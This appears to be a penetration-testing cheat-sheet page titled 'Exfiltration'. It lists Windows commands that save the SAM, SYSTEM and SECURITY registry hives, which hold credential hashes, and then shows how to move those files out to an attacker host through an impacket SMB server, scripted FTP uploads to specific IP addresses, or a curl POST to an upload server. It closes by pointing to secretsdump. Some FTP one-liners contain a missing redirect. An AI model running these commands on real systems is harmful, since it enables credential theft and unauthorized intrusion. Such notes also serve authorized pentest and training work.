Exfiltration

Dump the SAM hive to the pwd

reg.exe save HKLM\SAM C:\programdata\sam.bak

Dump the System hive to the pwd

reg.exe save HKLM\SYSTEM C:\programdata\system.bak

Dump the Security hive to the pwd

reg.exe save HKLM\SECURITY C:\programdata\security.bak

Spin up an smb server

impacket-smbserver share share/ -smb2support
echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

Exfiltrate data

python3 -m uploadserver
curl -X POST http://HOST/upload -H -F '[email protected]'

OR

python -m pyftpdlib -p 21 --write
echo open 192.168.45.237 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

OR

Dump hashes with secretsdump

Last updated